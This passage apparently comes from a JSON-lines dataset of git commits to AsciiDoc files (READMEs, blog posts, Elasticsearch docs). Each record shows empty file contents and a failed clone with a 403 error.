ImpressTV\/elasticsearch,humandb\/elasticsearch,qwerty4030\/elasticsearch,iamjakob\/elasticsearch,mcku\/elasticsearch,mmaracic\/elasticsearch,Shekharrajak\/elasticsearch,zhiqinghuang\/elasticsearch,jeteve\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,abibell\/elasticsearch,nazarewk\/elasticsearch,vvcephei\/elasticsearch,sdauletau\/elasticsearch,liweinan0423\/elasticsearch,TonyChai24\/ESSource,beiske\/elasticsearch,adrianbk\/elasticsearch,truemped\/elasticsearch,jimhooker2002\/elasticsearch,yynil\/elasticsearch,YosuaMichael\/elasticsearch,Brijeshrpatel9\/elasticsearch,jango2015\/elasticsearch,bawse\/elasticsearch,iantruslove\/elasticsearch,caengcjd\/elasticsearch,loconsolutions\/elasticsearch,umeshdangat\/elasticsearch,hanswang\/elasticsearch,gingerwizard\/elasticsearch,jimhooker2002\/elasticsearch,ricardocerq\/elasticsearch,AshishThakur\/elasticsearch,schonfeld\/elasticsearch,AshishThakur\/elasticsearch,tebriel\/elasticsearch,xpandan\/elasticsearch,sarwarbhuiyan\/elasticsearch,kingaj\/elasticsearch,nrkkalyan\/elasticsearch,dpursehouse\/elasticsearch,shreejay\/elasticsearch,tebriel\/elasticsearch,umeshdangat\/elasticsearch,jango2015\/elasticsearch,chirilo\/elasticsearch,easonC\/elasticsearch,LeoYao\/elasticsearch,dylan8902\/elasticsearch,diendt\/elasticsearch,elasticdog\/elasticsearch,btiernay\/elasticsearch,YosuaMichael\/elasticsearch,jbertouch\/elasticsearch,drewr\/elasticsearch,ThalaivaStars\/OrgRepo1,drewr\/elasticsearch,lzo\/elasticsearch-1,wenpos\/elasticsearch,maddin2016\/elasticsearch,springning\/elasticsearch,spiegela\/elasticsearch,lydonchandra\/elasticsearch,achow\/elasticsearch,caengcjd\/elasticsearch,MichaelLiZhou\/elasticsearch,onegambler\/elasticsearch,Charlesdong\/elasticsearch,jsgao0\/elasticsearch,Shepard1212\/elasticsearch,phani546\/elasticsearch,adrianbk\/elasticsearch,masterweb121\/elasticsearch,gmarz\/elasticsearch,phani546\/elasticsearch,infusionsoft\/elasticsearch,strapdata\/elassandra,mapr\/elasticsearch,vvcephei\/elasticsearch,yynil\/elasticsearch,dpursehouse\/elasticsearch,clintongormley\/elasticsearch,jchampion\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,pritishppai\/elasticsearch,vietlq\/elasticsearch,adrianbk\/elasticsearch,sposam\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,episerver\/elasticsearch,achow\/elasticsearch,KimTaehee\/elasticsearch,HarishAtGitHub\/elasticsearch,mapr\/elasticsearch,achow\/elasticsearch,JSCooke\/el
asticsearch,andrejserafim\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,weipinghe\/elasticsearch,lzo\/elasticsearch-1,franklanganke\/elasticsearch,EasonYi\/elasticsearch,acchen97\/elasticsearch,weipinghe\/elasticsearch,mcku\/elasticsearch,MisterAndersen\/elasticsearch,acchen97\/elasticsearch,yongminxia\/elasticsearch,xpandan\/elasticsearch,nazarewk\/elasticsearch,schonfeld\/elasticsearch,nomoa\/elasticsearch,dataduke\/elasticsearch,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,Charlesdong\/elasticsearch,ckclark\/elasticsearch,jimczi\/elasticsearch,xuzha\/elasticsearch,MichaelLiZhou\/elasticsearch,diendt\/elasticsearch,elancom\/elasticsearch,pritishppai\/elasticsearch,kalburgimanjunath\/elasticsearch,mohit\/elasticsearch,abibell\/elasticsearch,mgalushka\/elasticsearch,petabytedata\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra5-rc,strapdata\/elassandra-test,jango2015\/elasticsearch,PhaedrusTheGreek\/elasticsearch,scottsom\/elasticsearch,tahaemin\/elasticsearch,luiseduardohdbackup\/elasticsearch,jpountz\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,iantruslove\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,hafkensite\/elasticsearch,coding0011\/elasticsearch,PhaedrusTheGreek\/elasticsearch,masterweb121\/elasticsearch,karthikjaps\/elasticsearch,jchampion\/elasticsearch,beiske\/elasticsearch,wbowling\/elasticsearch,Uiho\/elasticsearch,achow\/elasticsearch,tahaemin\/elasticsearch,petabytedata\/elasticsearch,kingaj\/elasticsearch,kingaj\/elasticsearch,wuranbo\/elasticsearch,wayeast\/elasticsearch,HarishAtGitHub\/elasticsearch,Fsero\/elasticsearch,easonC\/elasticsearch,YosuaMichael\/elasticsearch,thecocce\/elasticsearch,mcku\/elasticsearch,mikemccand\/elasticsearch,lzo\/elasticsearch-1,obourgain\/elasticsearch,amaliujia\/elasticsearch,rlugojr\/elasticsearch,yuy168\/elasticsearch,mgalushka\/elasticsearch,winstonewert\/elasticsearch,vingupta3\/elasticsearch,socialrank\/elasticsearch,ulkas\/elasticsearch,ouyangkongtong\/elasticsearch,nilabhsagar\/elasticsearch,rento19962\/elasticsearch,HarishAtGitHub\/elasticsearch,huypx1292\/elasticsearch,MisterAndersen\/elasticsearch,infusionsoft\/elasticsearch,sreeramjayan\/elasticsearch,xingguang2013\/elasticsearch,likaiwalkman\/elasticsearch,ESamir\/elasticsearch,vvcephei\/elasticsearch,pablocastro\/elasticsearch,luiseduardohdbackup\/elasticsearch,mbrukman\/elasticsearch,coding0011\/elasticsearch,tsohil\/elasticsearch,LewayneNaidoo\/elasticsearch,polyfractal\/elasticsearch,vietlq\/elasticsearch,elasticdog\/elasticsearch,polyfractal\/elasticsearch,Helen-Zhao\/elasticsearch,jsgao0\/elasticsearch,lydonchandra\/elasticsearch,vietlq\/elasticsearch,Rygbee\/elasticsearch,Shekharrajak\/elasticsearch,nrkkalyan\/elasticsearch,Ansh90\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra5-rc,nomoa\/elasticsearch,AndreKR\/elasticsearch,HonzaKral\/elasticsearch,beiske\/elasticsearch,jprante\/elasticsearch,PhaedrusTheGreek\/elasticsearch,vietlq\/elasticsearch,caengcjd\/elasticsearch,strapdata\/elassandra-test,rajanm\/elasticsearch,jeteve\/elasticsearch,yanjunh\/elasticsearch,pritishppai\/elasticsearch,strapdata\/elassandra-test,mikemccand\/elasticsearch,tkssharma\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,mcku\/elasticsearch,MisterAndersen\/elasticsearch,kimimj\/elasticsearch,vingupta3\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,mm0\/elasticsearch,palecur\/elasticsearch,kevinkluge\/elasticsearch,wayeast\/
elasticsearch,hirdesh2008\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,kingaj\/elasticsearch,mrorii\/elasticsearch,AshishThakur\/elasticsearch,girirajsharma\/elasticsearch,dylan8902\/elasticsearch,jchampion\/elasticsearch,mgalushka\/elasticsearch,koxa29\/elasticsearch,rhoml\/elasticsearch,vingupta3\/elasticsearch,mute\/elasticsearch,nilabhsagar\/elasticsearch,wayeast\/elasticsearch,pritishppai\/elasticsearch,pablocastro\/elasticsearch,MichaelLiZhou\/elasticsearch,koxa29\/elasticsearch,HarishAtGitHub\/elasticsearch,Liziyao\/elasticsearch,zeroctu\/elasticsearch,vingupta3\/elasticsearch,mnylen\/elasticsearch,mbrukman\/elasticsearch,kunallimaye\/elasticsearch,LewayneNaidoo\/elasticsearch,loconsolutions\/elasticsearch,kingaj\/elasticsearch,tsohil\/elasticsearch,yongminxia\/elasticsearch,mjhennig\/elasticsearch,markllama\/elasticsearch,wbowling\/elasticsearch,clintongormley\/elasticsearch,scorpionvicky\/elasticsearch,kenshin233\/elasticsearch,wimvds\/elasticsearch,hirdesh2008\/elasticsearch,ZTE-PaaS\/elasticsearch,Ansh90\/elasticsearch,kimimj\/elasticsearch,Stacey-Gammon\/elasticsearch,AndreKR\/elasticsearch,overcome\/elasticsearch,wbowling\/elasticsearch,kenshin233\/elasticsearch,SergVro\/elasticsearch,rajanm\/elasticsearch,Collaborne\/elasticsearch,artnowo\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,F0lha\/elasticsearch,Uiho\/elasticsearch,yuy168\/elasticsearch,i-am-Nathan\/elasticsearch,mnylen\/elasticsearch,xingguang2013\/elasticsearch,fernandozhu\/elasticsearch,yuy168\/elasticsearch,mgalushka\/elasticsearch,tsohil\/elasticsearch,wimvds\/elasticsearch,tsohil\/elasticsearch,Rygbee\/elasticsearch,abibell\/elasticsearch,Collaborne\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,iacdingping\/elasticsearch,Shekharrajak\/elasticsearch,IanvsPoplicola\/elasticsearch,petabytedata\/elasticsearch,camilojd\/elasticsearch,andrestc\/elasticsearch,cnfire\/elasticsearch-1,szroland\/elasticsearch,JervyShi\/elasticsearch,rento19962\/elasticsearch,jbertouch\/elasticsearch,brandonkearby\/elasticsearch,lchennup\/elasticsearch,alexshadow007\/elasticsearch,kcompher\/elasticsearch,iacdingping\/elasticsearch,Charlesdong\/elasticsearch,qwerty4030\/elasticsearch,smflorentino\/elasticsearch,weipinghe\/elasticsearch,nknize\/elasticsearch,springning\/elasticsearch,lchennup\/elasticsearch,zhiqinghuang\/elasticsearch,vroyer\/elassandra,fooljohnny\/elasticsearch,fforbeck\/elasticsearch,sarwarbhuiyan\/elasticsearch,mute\/elasticsearch,caengcjd\/elasticsearch,socialrank\/elasticsearch,ThalaivaStars\/OrgRepo1,naveenhooda2000\/elasticsearch,ESamir\/elasticsearch,Ansh90\/elasticsearch,milodky\/elasticsearch,Shekharrajak\/elasticsearch,zeroctu\/elasticsearch,mrorii\/elasticsearch,maddin2016\/elasticsearch,sarwarbhuiyan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wayeast\/elasticsearch,cnfire\/elasticsearch-1,ImpressTV\/elasticsearch,YosuaMichael\/elasticsearch,fforbeck\/elasticsearch,kubum\/elasticsearch,milodky\/elasticsearch,liweinan0423\/elasticsearch,trangvh\/elasticsearch,wangtuo\/elasticsearch,fernandozhu\/elasticsearch,EasonYi\/elasticsearch,LewayneNaidoo\/elasticsearch,PhaedrusTheGreek\/elasticsearch,apepper\/elasticsearch,kimimj\/elasticsearch,yynil\/elasticsearch,strapdata\/elassandra-test,amit-shar\/elasticsearch,Widen\/elasticsearch,areek\/elasticsearch,davidvgalbraith\/elasticsearch,btiernay\/elasticsearch,markllama\/elasticsearch,bawse\/elasticsearch,Brijeshrpatel9\/elasticsearch,acchen97\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,SergVro\/e
lasticsearch,StefanGor\/elasticsearch,EasonYi\/elasticsearch,Ansh90\/elasticsearch,sdauletau\/elasticsearch,kenshin233\/elasticsearch,wbowling\/elasticsearch,tkssharma\/elasticsearch,elasticdog\/elasticsearch,springning\/elasticsearch,ckclark\/elasticsearch,obourgain\/elasticsearch,dataduke\/elasticsearch,yynil\/elasticsearch,easonC\/elasticsearch,nknize\/elasticsearch,hanswang\/elasticsearch,fernandozhu\/elasticsearch,petabytedata\/elasticsearch,luiseduardohdbackup\/elasticsearch,ckclark\/elasticsearch,kalimatas\/elasticsearch,sarwarbhuiyan\/elasticsearch,polyfractal\/elasticsearch,fekaputra\/elasticsearch,lchennup\/elasticsearch,andrejserafim\/elasticsearch,pritishppai\/elasticsearch,chirilo\/elasticsearch,markharwood\/elasticsearch,spiegela\/elasticsearch,amit-shar\/elasticsearch,kimimj\/elasticsearch,gingerwizard\/elasticsearch,MaineC\/elasticsearch,dataduke\/elasticsearch,tebriel\/elasticsearch,jango2015\/elasticsearch,Fsero\/elasticsearch,truemped\/elasticsearch,MichaelLiZhou\/elasticsearch,lmtwga\/elasticsearch,alexbrasetvik\/elasticsearch,springning\/elasticsearch,khiraiwa\/elasticsearch,elancom\/elasticsearch,nilabhsagar\/elasticsearch,amit-shar\/elasticsearch,fernandozhu\/elasticsearch,ImpressTV\/elasticsearch,iamjakob\/elasticsearch,wimvds\/elasticsearch,trangvh\/elasticsearch,MjAbuz\/elasticsearch,dataduke\/elasticsearch,YosuaMichael\/elasticsearch,strapdata\/elassandra5-rc,umeshdangat\/elasticsearch,Uiho\/elasticsearch,linglaiyao1314\/elasticsearch,sposam\/elasticsearch,bawse\/elasticsearch,ricardocerq\/elasticsearch,Siddartha07\/elasticsearch,jsgao0\/elasticsearch,lightslife\/elasticsearch,18098924759\/elasticsearch,fekaputra\/elasticsearch,zhiqinghuang\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,nazarewk\/elasticsearch,mnylen\/elasticsearch,sdauletau\/elasticsearch,xuzha\/elasticsearch,yongminxia\/elasticsearch,vingupta3\/elasticsearch,ydsakyclguozi\/elasticsearch,jprante\/elasticsearch,Collaborne\/elasticsearch,thecocce\/elasticsearch,acchen97\/elasticsearch,phani546\/elasticsearch,mbrukman\/elasticsearch,gmarz\/elasticsearch,jsgao0\/elasticsearch,zhiqinghuang\/elasticsearch,jimczi\/elasticsearch,koxa29\/elasticsearch,Uiho\/elasticsearch,karthikjaps\/elasticsearch,iantruslove\/elasticsearch,nellicus\/elasticsearch,tsohil\/elasticsearch,sarwarbhuiyan\/elasticsearch,mm0\/elasticsearch,lzo\/elasticsearch-1,huypx1292\/elasticsearch,skearns64\/elasticsearch,JSCooke\/elasticsearch,nezirus\/elasticsearch,Collaborne\/elasticsearch,liweinan0423\/elasticsearch,lks21c\/elasticsearch,humandb\/elasticsearch,strapdata\/elassandra5-rc,tkssharma\/elasticsearch,jeteve\/elasticsearch,szroland\/elasticsearch,markllama\/elasticsearch,JackyMai\/elasticsearch,Widen\/elasticsearch,alexshadow007\/elasticsearch,petabytedata\/elasticsearch,MaineC\/elasticsearch,mm0\/elasticsearch,mmaracic\/elasticsearch,wenpos\/elasticsearch,elancom\/elasticsearch,kcompher\/elasticsearch,Siddartha07\/elasticsearch,drewr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jpountz\/elasticsearch,szroland\/elasticsearch,bestwpw\/elasticsearch,schonfeld\/elasticsearch,karthikjaps\/elasticsearch,mcku\/elasticsearch,SergVro\/elasticsearch,dataduke\/elasticsearch,awislowski\/elasticsearch,himanshuag\/elasticsearch,Shepard1212\/elasticsearch,hafkensite\/elasticsearch,kevinkluge\/elasticsearch,alexbrasetvik\/elasticsearch,snikch\/elasticsearch,easonC\/elasticsearch,hirdesh2008\/elasticsearch,obourgain\/elasticsearch,masterweb121\/elasticsearch,phani546\/elasticsearch,hanswang\/elasticsearch,zeroctu\/elasticsea
rch,pozhidaevak\/elasticsearch,Shepard1212\/elasticsearch,franklanganke\/elasticsearch,mm0\/elasticsearch,acchen97\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,iantruslove\/elasticsearch,knight1128\/elasticsearch,kenshin233\/elasticsearch,khiraiwa\/elasticsearch,kalimatas\/elasticsearch,lzo\/elasticsearch-1,pablocastro\/elasticsearch,dpursehouse\/elasticsearch,henakamaMSFT\/elasticsearch,likaiwalkman\/elasticsearch,mute\/elasticsearch,markllama\/elasticsearch,ImpressTV\/elasticsearch,drewr\/elasticsearch,snikch\/elasticsearch,hirdesh2008\/elasticsearch,AshishThakur\/elasticsearch,F0lha\/elasticsearch,thecocce\/elasticsearch,sneivandt\/elasticsearch,MetSystem\/elasticsearch,episerver\/elasticsearch,jbertouch\/elasticsearch,fekaputra\/elasticsearch,ricardocerq\/elasticsearch,mm0\/elasticsearch,MetSystem\/elasticsearch,andrestc\/elasticsearch,huanzhong\/elasticsearch,Siddartha07\/elasticsearch,ouyangkongtong\/elasticsearch,yongminxia\/elasticsearch,truemped\/elasticsearch,jpountz\/elasticsearch,hydro2k\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,mbrukman\/elasticsearch,rhoml\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,girirajsharma\/elasticsearch,GlenRSmith\/elasticsearch,chirilo\/elasticsearch,avikurapati\/elasticsearch,JackyMai\/elasticsearch,dylan8902\/elasticsearch,truemped\/elasticsearch,mmaracic\/elasticsearch,mapr\/elasticsearch,kaneshin\/elasticsearch,masterweb121\/elasticsearch,mnylen\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,nellicus\/elasticsearch,hirdesh2008\/elasticsearch,TonyChai24\/ESSource,Uiho\/elasticsearch,jchampion\/elasticsearch,JackyMai\/elasticsearch,Siddartha07\/elasticsearch,lightslife\/elasticsearch,rhoml\/elasticsearch,xpandan\/elasticsearch,nrkkalyan\/elasticsearch,onegambler\/elasticsearch,spiegela\/elasticsearch,nellicus\/elasticsearch,bestwpw\/elasticsearch,masaruh\/elasticsearch,lzo\/elasticsearch-1,kaneshin\/elasticsearch,lydonchandra\/elasticsearch,ouyangkongtong\/elasticsearch,luiseduardohdbackup\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,huanzhong\/elasticsearch,humandb\/elasticsearch,iamjakob\/elasticsearch,henakamaMSFT\/elasticsearch,dataduke\/elasticsearch,cnfire\/elasticsearch-1,ivansun1010\/elasticsearch,queirozfcom\/elasticsearch,myelin\/elasticsearch,LeoYao\/elasticsearch,beiske\/elasticsearch,pablocastro\/elasticsearch,MaineC\/elasticsearch,aglne\/elasticsearch,humandb\/elasticsearch,sposam\/elasticsearch,franklanganke\/elasticsearch,huypx1292\/elasticsearch,myelin\/elasticsearch,awislowski\/elasticsearch,martinstuga\/elasticsearch,C-Bish\/elasticsearch,milodky\/elasticsearch,Stacey-Gammon\/elasticsearch,weipinghe\/elasticsearch,ouyangkongtong\/elasticsearch,pozhidaevak\/elasticsearch,vroyer\/elassandra,mgalushka\/elasticsearch,himanshuag\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,Collaborne\/elasticsearch,myelin\/elasticsearch,lightslife\/elasticsearch,humandb\/elasticsearch,Kakakakakku\/elasticsearch,drewr\/elasticsearch,slavau\/elasticsearch,snikch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,palecur\/elasticsearch,jango2015\/elasticsearch,zhiqinghuang\/elasticsearch,kubum\/elasticsearch,socialrank\/elasticsearch,himanshuag\/elasticsearch,gfyoung\/elasticsearch,iacdingping\/elasticsearch,sdauletau\/elasticsearch,diendt\/elasticsearch,njlawton\/elasticsearch,szroland\/elasticsearch,Kakakakakku\/elasticsearch,mjason3\/elasticsearch,ivansun1010\/elasticsearch,aglne\/elasticsearch,F0lha\/elasticsearch,chirilo\/elasticsearch,queirozfcom\/elasticsearch
,davidvgalbraith\/elasticsearch,pranavraman\/elasticsearch,AshishThakur\/elasticsearch,Fsero\/elasticsearch,geidies\/elasticsearch,kenshin233\/elasticsearch,mute\/elasticsearch,YosuaMichael\/elasticsearch,aglne\/elasticsearch,lmtwga\/elasticsearch,Shepard1212\/elasticsearch,knight1128\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,kimimj\/elasticsearch,Siddartha07\/elasticsearch,markwalkom\/elasticsearch,snikch\/elasticsearch,mohit\/elasticsearch,chirilo\/elasticsearch,pranavraman\/elasticsearch,infusionsoft\/elasticsearch,GlenRSmith\/elasticsearch,trangvh\/elasticsearch,dpursehouse\/elasticsearch,kaneshin\/elasticsearch,drewr\/elasticsearch,uschindler\/elasticsearch,kunallimaye\/elasticsearch,nezirus\/elasticsearch,springning\/elasticsearch,Fsero\/elasticsearch,iamjakob\/elasticsearch,lmtwga\/elasticsearch,zkidkid\/elasticsearch,vvcephei\/elasticsearch,vroyer\/elasticassandra,avikurapati\/elasticsearch,avikurapati\/elasticsearch,apepper\/elasticsearch,amit-shar\/elasticsearch,gfyoung\/elasticsearch,slavau\/elasticsearch,kubum\/elasticsearch,achow\/elasticsearch,huanzhong\/elasticsearch,scottsom\/elasticsearch,kingaj\/elasticsearch,ulkas\/elasticsearch,MisterAndersen\/elasticsearch,markllama\/elasticsearch,Rygbee\/elasticsearch,MetSystem\/elasticsearch,clintongormley\/elasticsearch,naveenhooda2000\/elasticsearch,Charlesdong\/elasticsearch,wimvds\/elasticsearch,a2lin\/elasticsearch,camilojd\/elasticsearch,elancom\/elasticsearch,xingguang2013\/elasticsearch,vvcephei\/elasticsearch,markharwood\/elasticsearch,umeshdangat\/elasticsearch,hafkensite\/elasticsearch,btiernay\/elasticsearch,kevinkluge\/elasticsearch,xpandan\/elasticsearch,mohit\/elasticsearch,kcompher\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,Rygbee\/elasticsearch,elancom\/elasticsearch,Shekharrajak\/elasticsearch,alexbrasetvik\/elasticsearch,ESamir\/elasticsearch,AndreKR\/elasticsearch,i-am-Nathan\/elasticsearch,dylan8902\/elasticsearch,mbrukman\/elasticsearch,kenshin233\/elasticsearch,rajanm\/elasticsearch,iantruslove\/elasticsearch,skearns64\/elasticsearch,aglne\/elasticsearch,sc0ttkclark\/elasticsearch,schonfeld\/elasticsearch,Liziyao\/elasticsearch,mjhennig\/elasticsearch,GlenRSmith\/elasticsearch,wimvds\/elasticsearch,fforbeck\/elasticsearch,karthikjaps\/elasticsearch,acchen97\/elasticsearch,cnfire\/elasticsearch-1,coding0011\/elasticsearch,jsgao0\/elasticsearch,myelin\/elasticsearch,lightslife\/elasticsearch,MichaelLiZhou\/elasticsearch,mmaracic\/elasticsearch,TonyChai24\/ESSource,NBSW\/elasticsearch,mortonsykes\/elasticsearch,markharwood\/elasticsearch,lightslife\/elasticsearch,JervyShi\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,easonC\/elasticsearch,girirajsharma\/elasticsearch,xingguang2013\/elasticsearch,linglaiyao1314\/elasticsearch,rlugojr\/elasticsearch,areek\/elasticsearch,LeoYao\/elasticsearch,dongjoon-hyun\/elasticsearch,Ansh90\/elasticsearch,beiske\/elasticsearch,dongjoon-hyun\/elasticsearch","old_file":"docs\/reference\/index-modules\/translog.asciidoc","new_file":"docs\/reference\/index-modules\/translog.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55ac56441da7d53dad8cff86f2602f0a68359d07","subject":"Update 2014-01-19-Piwik-Javatracker.adoc","message":"Update 
2014-01-19-Piwik-Javatracker.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2014-01-19-Piwik-Javatracker.adoc","new_file":"_posts\/2014-01-19-Piwik-Javatracker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac6bf03f63d5d2292bd4a220c29088b13e4052ea","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36af226bd0ecf9bb1e81fca93f71e58ace120666","subject":"Correct ASCIIDoc format","message":"Correct ASCIIDoc format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"87f4cdecd1e6a564916723ad59df8959a7395560","subject":"Update 2018-07-18-float.adoc","message":"Update 2018-07-18-float.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-18-float.adoc","new_file":"_posts\/2018-07-18-float.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00a1ff2192daa9b94f5f33a596fa8edc6b87fc17","subject":"Updated documentation","message":"Updated documentation\n","repos":"storozhukBM\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7427b340435427316f2e22d361aa3e86e1556ed","subject":"Tidy.","message":"Tidy.\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1755f1a9c63588ac0d8d28ede9a0573c09d55483","subject":"Updated README","message":"Updated 
README\n","repos":"drmaas\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j,storozhukBM\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e7b2f970e10291b2a9ed5c3a16c5399500b436b","subject":"fix typo; add Asciidoctor link","message":"fix typo; add Asciidoctor link\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87df13e48a26e2420ba817eb35e22a9bde39daff","subject":"Add paragraph on development process in README","message":"Add paragraph on development process in README\n","repos":"gwidgets\/gwt-project-generator,Arsene07\/forge,bclozel\/initializr,nevenc-pivotal\/initializr,nevenc-pivotal\/initializr,gwidgets\/gwt-project-generator,spring-io\/initializr,bclozel\/initializr,gwidgets\/gwt-project-generator,snicoll\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,snicoll\/initializr,bclozel\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,bclozel\/initializr,snicoll\/initializr,spring-io\/initializr,spring-io\/initializr,Arsene07\/forge,Arsene07\/forge,nevenc-pivotal\/initializr,bclozel\/initializr,gwidgets\/gwt-project-generator","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snicoll\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c64f65f25b3530795a5431ec57cb2357f78ee98","subject":"fix badge","message":"fix badge\n","repos":"binout\/jaxrs-unit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/jaxrs-unit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62b557d2e2934cad982adf5994ac76e8f09289e2","subject":"Update 2015-12-25-Removing-commit-from-git.adoc","message":"Update 2015-12-25-Removing-commit-from-git.adoc","repos":"smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io","old_file":"_posts\/2015-12-25-Removing-commit-from-git.adoc","new_file":"_posts\/2015-12-25-Removing-commit-from-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smirnoffs\/smirnoffs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"101c3abf20e4a2541e5ee78d9fb287f38dfd6544","subject":"Update 2015-08-13-Cursos-de-Hubpress-Profesional.adoc","message":"Update 
